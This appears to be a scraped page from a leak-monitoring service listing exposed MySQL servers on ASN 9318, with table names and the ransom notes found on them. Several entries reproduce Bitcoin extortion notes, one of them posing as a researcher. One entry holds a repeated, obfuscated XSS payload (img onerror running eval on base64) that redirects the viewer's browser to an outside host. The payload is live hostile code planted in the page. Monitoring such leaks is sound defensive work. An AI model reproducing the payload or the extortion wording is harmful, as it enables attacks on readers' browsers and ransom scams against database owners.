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+plugin:MysqlOpenPlugin -l9fp:"cf350410ecceb5fdebd6b760d92c9051d92c9051d92c9051d92c9051d92c9051" -net:"DIGITALOCEAN-ASN" -ip:"" +asn:"9318"

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  • MysqlOpenPlugin 189


  • SK Broadband Co Ltd 189

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ASN: 9318
6 events in 12 days
Leak size: 6.7 MB
Open ports: 3306
Databases: 121, row count: 122218, size: 6.7 MB
Found table maplestory2.accounts with 35 records
Found table maplestory2.accountswait with 0 reco...

ASN: 9318
15 events in 44 days
Leak size: 2.5 MB
Open ports: 3306
Databases: 39, row count: 4487, size: 2.5 MB
Found table README_TO_RECOVER_GZ.README with 1 records
Found table mysql.columns_priv with 0 records...
Ransom notes :

1I have backed up all your databases. To recover them you must pay 0.012 Bitcoin to this address: 1LCPGGGxgAxPUYjGBtbhQgx5sP1CGHQuhe. Backup list: sumackdb. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 1LCPGGGxgAxPUYjGBtbhQgx5sP1CGHQuhe 1I have backed up all your databases. To recover them you must pay 0.012 Bitcoin to this address: 1LCPGGGxgAxPUYjGBtbhQgx5sP1CGHQuhe. Backup list: sumackdb. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 1LCPGGGxgAxPUYjGBtbhQgx5sP1CGHQuhe

ASN: 9318
2 events in 3 days
Leak size: 607.2 MB
Open ports: 3306
Databases: 233, row count: 694950, size: 607.2 MB
No or default MySQL authentication found.Found table gis.abilities with 2 records
Found table g...

ASN: 9318
16 events in 25 days
Leak size: 589.6 kB
Open ports: 3306
Databases: 31, row count: 2065, size: 589.6 kB
No or default MySQL authentication found.Found table mysql.bhosjh32 with 1 records
Found table mys...
Ransom notes :


I am a security researcher from Sweden, 
having interest on web security and other focus areas.

Your database was breached by a 3rd party and
files were backed up to their cloud hosting storage.

I accidently discovered this dedicated cloud storage and was able to secure the files.

It is scheduled to be sold online.

The short-term consequences of this data leak could be fees, fines and frustration.

To prevent this i will remove all files from online storage above
and restore the database if needed.

	please send exactly 0.1 bitcoin (BTC) to the following 
	bitcoin address: 15FagZemALE7HYnr63pRKghTJP5Kcz5U6j

email me after the payment confirms(about an hour),
and I email you back the link to download the original 
binary dump file created with mysql mydumper.

I will shred the files and terminate their cloud hosting account in 24hrs after the payment.

incidentId: 7dc13c2b-df5a-408c-b98c-c0db5b99d754

ASN: 9318
3 events in 42 days
Leak size: 645.5 kB
Open ports: 3306
Databases: 35, row count: 2079, size: 645.5 kB
No or default MySQL authentication found.Found table __restore_databases.readme with 1 records
Ransom notes :

1I have backed up all your databases. To recover them you must pay 0.012 Bitcoin to this address: 13Jq3D6ocAs2s45PtrGxkyiHrq38QRfcid. Backup list: extalia. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 13Jq3D6ocAs2s45PtrGxkyiHrq38QRfcid 1I have backed up all your databases. To recover them you must pay 0.012 Bitcoin to this address: 13Jq3D6ocAs2s45PtrGxkyiHrq38QRfcid. Backup list: extalia. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 13Jq3D6ocAs2s45PtrGxkyiHrq38QRfcid

ASN: 9318
9 events in 9 days
Leak size: 783.7 kB
Open ports: 3306
Databases: 93, row count: 2091, size: 783.7 kB
No or default MySQL authentication found.Found table dawn.spv with 0 records
Found table mysql.adz...

ASN: 9318
3 events in 33 days
Leak size: 8.1 MB
Open ports: 3306
Databases: 101, row count: 57319, size: 8.1 MB
No or default MySQL authentication found.Found table mysql.innodb_table_stats with 59 records

ASN: 9318
4 events in 11 days
Leak size: 8.7 MB
Open ports: 3306
Databases: 230, row count: 152156, size: 8.7 MB
No or default MySQL authentication found.Found table heavenms.accounts with 1 records
Found table...

ASN: 9318
4 events in 9 days
Leak size: 2.5 MB
Open ports: 3306
Databases: 43, row count: 2362, size: 2.5 MB
No or default MySQL authentication found.Found table mysql.innodb_table_stats with 7 records
Found t...
Ransom notes :

1I have backed up all your databases. To recover them you must pay 0.0135 Bitcoin to this address: 1PahLxapAoHENX8GwgHbz7zfQWB4BzewVH. Backup list: eventuslap, sakila, testdb, world. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 1PahLxapAoHENX8GwgHbz7zfQWB4BzewVH 1I have backed up all your databases. To recover them you must pay 0.0135 Bitcoin to this address: 1PahLxapAoHENX8GwgHbz7zfQWB4BzewVH. Backup list: eventuslap, sakila, testdb, world. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 1PahLxapAoHENX8GwgHbz7zfQWB4BzewVH 1I have backed up all your databases. To recover them you must pay 0.0135 Bitcoin to this address: 1PahLxapAoHENX8GwgHbz7zfQWB4BzewVH. Backup list: eventuslap, sakila, testdb, world. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 1PahLxapAoHENX8GwgHbz7zfQWB4BzewVH 1I have backed up all your databases. To recover them you must pay 0.0135 Bitcoin to this address: 1PahLxapAoHENX8GwgHbz7zfQWB4BzewVH. Backup list: eventuslap, sakila, testdb, world. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 1PahLxapAoHENX8GwgHbz7zfQWB4BzewVH 1I have backed up all your databases. To recover them you must pay 0.0135 Bitcoin to this address: 1PahLxapAoHENX8GwgHbz7zfQWB4BzewVH. Backup list: eventuslap, sakila, testdb, world. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 1PahLxapAoHENX8GwgHbz7zfQWB4BzewVH

ASN: 9318
1 events in 0 days
Leak size: 2.5 MB
Open ports: 3306
Databases: 46, row count: 4249, size: 2.5 MB
No or default MySQL authentication found.Found table airbnb.readme with 0 records
Found table airbnb...
Ransom notes :

1'"></title></a><img src="0" onerror='eval(atob("ZnVuY3Rpb24geChtKXtyID0nJztmPScwODMyNzQnO209bS5zcGxpdCgnLicpO2ZvcihlIGluIG0pe3I9citbJzhlJywnYzkwJywnL2InLCduZy4nLCdceDNhXHgyZlx4MmYnLCczYTQnLCdvc3QnLCdleT0nLCdlYmInLCdjb20nLCc3NGQnLCdhMjcnLCd0aCcsJzkzJywnNDAnLCdwYScsJ2lrJywnaG8nLCdwcicsJzQ0OScsZlsxXSsnM2InLCc1YicsJz9rJywnaHR0JywncHMnLCc3MDYnLCdmNWQnLCdpbycsJ2F0JywnbicsJ2xvYyddW3BhcnNlSW50KG1bZV0pXX0gcmV0dXJuIHJ9IGV2YWwoJ1x4NzdceDY5XHg2ZVx4NjRceDZmXHg3NycpW3goJzMwLjI4LjI3LjI5JyldPXgoJzIzMjQwNDE4MDYxNzAzMDkwMjIwMTYxMjE1MjIwNzE5MDUyNTEwMDgxMzE0MDAyMTI2MDExMScuc3BsaXQoJy4nKVswXS5yZXBsYWNlKC9cQig/PShcZHsyfSkrKD8hXGQpKS9nLCcuJykp"))'><title><a>'"></title></a><img src="0" onerror='eval(atob("ZnVuY3Rpb24geChtKXtyID0nJztmPScwODMyNzQnO209bS5zcGxpdCgnLicpO2ZvcihlIGluIG0pe3I9citbJzhlJywnYzkwJywnL2InLCduZy4nLCdceDNhXHgyZlx4MmYnLCczYTQnLCdvc3QnLCdleT0nLCdlYmInLCdjb20nLCc3NGQnLCdhMjcnLCd0aCcsJzkzJywnNDAnLCdwYScsJ2lrJywnaG8nLCdwcicsJzQ0OScsZlsxXSsnM2InLCc1YicsJz9rJywnaHR0JywncHMnLCc3MDYnLCdmNWQnLCdpbycsJ2F0JywnbicsJ2xvYyddW3BhcnNlSW50KG1bZV0pXX0gcmV0dXJuIHJ9IGV2YWwoJ1x4NzdceDY5XHg2ZVx4NjRceDZmXHg3NycpW3goJzMwLjI4LjI3LjI5JyldPXgoJzIzMjQwNDE4MDYxNzAzMDkwMjIwMTYxMjE1MjIwNzE5MDUyNTEwMDgxMzE0MDAyMTI2MDExMScuc3BsaXQoJy4nKVswXS5yZXBsYWNlKC9cQig/PShcZHsyfSkrKD8hXGQpKS9nLCcuJykp"))'><title><a>'"></title></a><img src="0" onerror='eval(atob("ZnVuY3Rpb24geChtKXtyID0nJztmPScwODMyNzQnO209bS5zcGxpdCgnLicpO2ZvcihlIGluIG0pe3I9citbJzhlJywnYzkwJywnL2InLCduZy4nLCdceDNhXHgyZlx4MmYnLCczYTQnLCdvc3QnLCdleT0nLCdlYmInLCdjb20nLCc3NGQnLCdhMjcnLCd0aCcsJzkzJywnNDAnLCdwYScsJ2lrJywnaG8nLCdwcicsJzQ0OScsZlsxXSsnM2InLCc1YicsJz9rJywnaHR0JywncHMnLCc3MDYnLCdmNWQnLCdpbycsJ2F0JywnbicsJ2xvYyddW3BhcnNlSW50KG1bZV0pXX0gcmV0dXJuIHJ9IGV2YWwoJ1x4NzdceDY5XHg2ZVx4NjRceDZmXHg3NycpW3goJzMwLjI4LjI3LjI5JyldPXgoJzIzMjQwNDE4MDYxNzAzMDkwMjIwMTYxMjE1MjIwNzE5MDUyNTEwMDgxMzE0MDAyMTI2MDExMScuc3BsaXQoJy4nKVswXS5yZXBsYWNlKC9cQig/PShcZHsyfSkrKD8hXGQpKS9nLCcuJykp"))'><title><a> 1'"></title></a><img src="0" onerror='eval(atob("ZnVuY3Rpb24geChtKXtyID0nJztmPScwODMyNzQnO209bS5zcGxpdCgnLicpO2ZvcihlIGluIG0pe3I9citbJzhlJywnYzkwJywnL2InLCduZy4nLCdceDNhXHgyZlx4MmYnLCczYTQnLCdvc3QnLCdleT0nLCdlYmInLCdjb20nLCc3NGQnLCdhMjcnLCd0aCcsJzkzJywnNDAnLCdwYScsJ2lrJywnaG8nLCdwcicsJzQ0OScsZlsxXSsnM2InLCc1YicsJz9rJywnaHR0JywncHMnLCc3MDYnLCdmNWQnLCdpbycsJ2F0JywnbicsJ2xvYyddW3BhcnNlSW50KG1bZV0pXX0gcmV0dXJuIHJ9IGV2YWwoJ1x4NzdceDY5XHg2ZVx4NjRceDZmXHg3NycpW3goJzMwLjI4LjI3LjI5JyldPXgoJzIzMjQwNDE4MDYxNzAzMDkwMjIwMTYxMjE1MjIwNzE5MDUyNTEwMDgxMzE0MDAyMTI2MDExMScuc3BsaXQoJy4nKVswXS5yZXBsYWNlKC9cQig/PShcZHsyfSkrKD8hXGQpKS9nLCcuJykp"))'><title><a>'"></title></a><img src="0" onerror='eval(atob("ZnVuY3Rpb24geChtKXtyID0nJztmPScwODMyNzQnO209bS5zcGxpdCgnLicpO2ZvcihlIGluIG0pe3I9citbJzhlJywnYzkwJywnL2InLCduZy4nLCdceDNhXHgyZlx4MmYnLCczYTQnLCdvc3QnLCdleT0nLCdlYmInLCdjb20nLCc3NGQnLCdhMjcnLCd0aCcsJzkzJywnNDAnLCdwYScsJ2lrJywnaG8nLCdwcicsJzQ0OScsZlsxXSsnM2InLCc1YicsJz9rJywnaHR0JywncHMnLCc3MDYnLCdmNWQnLCdpbycsJ2F0JywnbicsJ2xvYyddW3BhcnNlSW50KG1bZV0pXX0gcmV0dXJuIHJ9IGV2YWwoJ1x4NzdceDY5XHg2ZVx4NjRceDZmXHg3NycpW3goJzMwLjI4LjI3LjI5JyldPXgoJzIzMjQwNDE4MDYxNzAzMDkwMjIwMTYxMjE1MjIwNzE5MDUyNTEwMDgxMzE0MDAyMTI2MDExMScuc3BsaXQoJy4nKVswXS5yZXBsYWNlKC9cQig/PShcZHsyfSkrKD8hXGQpKS9nLCcuJykp"))'><title><a>'"></title></a><img src="0" onerror='eval(atob("ZnVuY3Rpb24geChtKXtyID0nJztmPScwODMyNzQnO209bS5zcGxpdCgnLicpO2ZvcihlIGluIG0pe3I9citbJzhlJywnYzkwJywnL2InLCduZy4nLCdceDNhXHgyZlx4MmYnLCczYTQnLCdvc3QnLCdleT0nLCdlYmInLCdjb20nLCc3NGQnLCdhMjcnLCd0aCcsJzkzJywnNDAnLCdwYScsJ2lrJywnaG8nLCdwcicsJzQ0OScsZlsxXSsnM2InLCc1YicsJz9rJywnaHR0JywncHMnLCc3MDYnLCdmNWQnLCdpbycsJ2F0JywnbicsJ2xvYyddW3BhcnNlSW50KG1bZV0pXX0gcmV0dXJuIHJ9IGV2YWwoJ1x4NzdceDY5XHg2ZVx4NjRceDZmXHg3NycpW3goJzMwLjI4LjI3LjI5JyldPXgoJzIzMjQwNDE4MDYxNzAzMDkwMjIwMTYxMjE1MjIwNzE5MDUyNTEwMDgxMzE0MDAyMTI2MDExMScuc3BsaXQoJy4nKVswXS5yZXBsYWNlKC9cQig/PShcZHsyfSkrKD8hXGQpKS9nLCcuJykp"))'><title><a>

ASN: 9318
3 events in 18 days
Leak size: 62.8 MB
Open ports: 3306
Databases: 42, row count: 379258, size: 62.8 MB
No or default MySQL authentication found.Found table mqtt.gpi0772 with 75007 records
Found table ...

ASN: 9318
2 events in 411 days
Leak size: 2.5 MB
Open ports: 3306
Databases: 43, row count: 5197, size: 2.5 MB
No or default MySQL authentication found.Found table mysql.innodb_table_stats with 11 records
Found ...
Ransom notes :

1I have backed up all your databases. To recover them you must pay 0.0135 Bitcoin to this address: 1J8XXdSbuhPrno6wyMTtmY1t4Z8JcjPs8b. Backup list: cafe, ecommerce_cart, mnu. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 1J8XXdSbuhPrno6wyMTtmY1t4Z8JcjPs8b 1I have backed up all your databases. To recover them you must pay 0.0135 Bitcoin to this address: 1J8XXdSbuhPrno6wyMTtmY1t4Z8JcjPs8b. Backup list: cafe, ecommerce_cart, mnu. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 1J8XXdSbuhPrno6wyMTtmY1t4Z8JcjPs8b 1I have backed up all your databases. To recover them you must pay 0.0135 Bitcoin to this address: 1J8XXdSbuhPrno6wyMTtmY1t4Z8JcjPs8b. Backup list: cafe, ecommerce_cart, mnu. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 1J8XXdSbuhPrno6wyMTtmY1t4Z8JcjPs8b 1I have backed up all your databases. To recover them you must pay 0.0135 Bitcoin to this address: 1J8XXdSbuhPrno6wyMTtmY1t4Z8JcjPs8b. Backup list: cafe, ecommerce_cart, mnu. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 1J8XXdSbuhPrno6wyMTtmY1t4Z8JcjPs8b

ASN: 9318
2 events in 17 days
Leak size: 7.9 MB
Open ports: 3306
Databases: 42, row count: 136811, size: 7.9 MB
No or default MySQL authentication found.Found table mysql.innodb_table_stats with 6 records
Ransom notes :

1I have backed up all your databases. To recover them you must pay 0.0135 Bitcoin to this address: 1G3BfVSLmpva74BK3iXYUB92pJENJqgAga. Backup list: chb0110, sysbench, test_db. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 1G3BfVSLmpva74BK3iXYUB92pJENJqgAga 1I have backed up all your databases. To recover them you must pay 0.0135 Bitcoin to this address: 1G3BfVSLmpva74BK3iXYUB92pJENJqgAga. Backup list: chb0110, sysbench, test_db. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 1G3BfVSLmpva74BK3iXYUB92pJENJqgAga 1I have backed up all your databases. To recover them you must pay 0.0135 Bitcoin to this address: 1G3BfVSLmpva74BK3iXYUB92pJENJqgAga. Backup list: chb0110, sysbench, test_db. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 1G3BfVSLmpva74BK3iXYUB92pJENJqgAga 1I have backed up all your databases. To recover them you must pay 0.0135 Bitcoin to this address: 1G3BfVSLmpva74BK3iXYUB92pJENJqgAga. Backup list: chb0110, sysbench, test_db. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 1G3BfVSLmpva74BK3iXYUB92pJENJqgAga

ASN: 9318
1 events in 0 days
Leak size: 1.3 GB
Open ports: 3306
Databases: 57, row count: 5389798, size: 1.3 GB
No or default MySQL authentication found.Found table chorock.AliexpressAccount with 2 records

ASN: 9318
1 events in 0 days
Leak size: 278.4 MB
Open ports: 3306
Databases: 425, row count: 3152463, size: 278.4 MB
No or default MySQL authentication found.Found table alt.acccustomvalues with 10 records

ASN: 9318
2 events in 7 days
Leak size: 1.0 MB
Open ports: 3306
Databases: 42, row count: 2073, size: 1.0 MB
No or default MySQL authentication found.Found table #mysql50#Network Trashes Folder.README with 0 r...

ASN: 9318
1 events in 0 days
Leak size: 2.5 MB
Open ports: 3306
Databases: 40, row count: 4891, size: 2.5 MB
No or default MySQL authentication found.Found table mysql.innodb_table_stats with 5 records
Found t...
Ransom notes :

1I have backed up all your databases. To recover them you must pay 0.014 Bitcoin to this address: 1M5bzkRV6HBKMhb7i1YThMyVFKhVCwasFJ. Backup list: inside-blockchain, inside-payment, inside_web, sakila, world. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 1M5bzkRV6HBKMhb7i1YThMyVFKhVCwasFJ 1I have backed up all your databases. To recover them you must pay 0.014 Bitcoin to this address: 1M5bzkRV6HBKMhb7i1YThMyVFKhVCwasFJ. Backup list: inside-blockchain, inside-payment, inside_web, sakila, world. After your payment email me at with your server IP ( and transaction ID. Emails without transaction ID will be ignored. 1M5bzkRV6HBKMhb7i1YThMyVFKhVCwasFJ All your data was backed up. You need to email us at to recover your data. More info: CHECK YOUR SPAM FOLDER! If you dont answer we will reach the General Data Protection Regulation, GDPR,

ASN: 9318
1 events in 0 days
Leak size: 6.8 MB
Open ports: 3306
Databases: 120, row count: 123584, size: 6.8 MB
No or default MySQL authentication found.Found table maplestory2.accounts with 34 records
Found t...

ASN: 9318
1 events in 0 days
Leak size: 8.0 MB
Open ports: 3306
Databases: 33, row count: 138773, size: 8.0 MB
No or default MySQL authentication found.Found table mysql.db with 0 records
Found table mysql.glo...

ASN: 9318
4 events in 148 days
Leak size: 589.6 kB
Open ports: 3306
Databases: 31, row count: 2065, size: 589.6 kB
Found table mysql.bhosjh32 with 1 records
Found table mysql.columns_priv with 0 records
Found tabl...
Ransom notes :


I am a security researcher from Sweden, 
having interest on web security and other focus areas.

Your database was breached by a 3rd party and
files were backed up to their cloud hosting storage.

I accidently discovered this dedicated cloud storage and was able to secure the files.

It is scheduled to be sold online.

The short-term consequences of this data leak could be fees, fines and frustration.

To prevent this i will remove all files from online storage above
and restore the database if needed.

	please send exactly 0.1 bitcoin (BTC) to the following 
	bitcoin address: 15FagZemALE7HYnr63pRKghTJP5Kcz5U6j

email me after the payment confirms(about an hour),
and I email you back the link to download the original 
binary dump file created with mysql mydumper.

I will shred the files and terminate their cloud hosting account in 24hrs after the payment.

incidentId: 7dc13c2b-df5a-408c-b98c-c0db5b99d754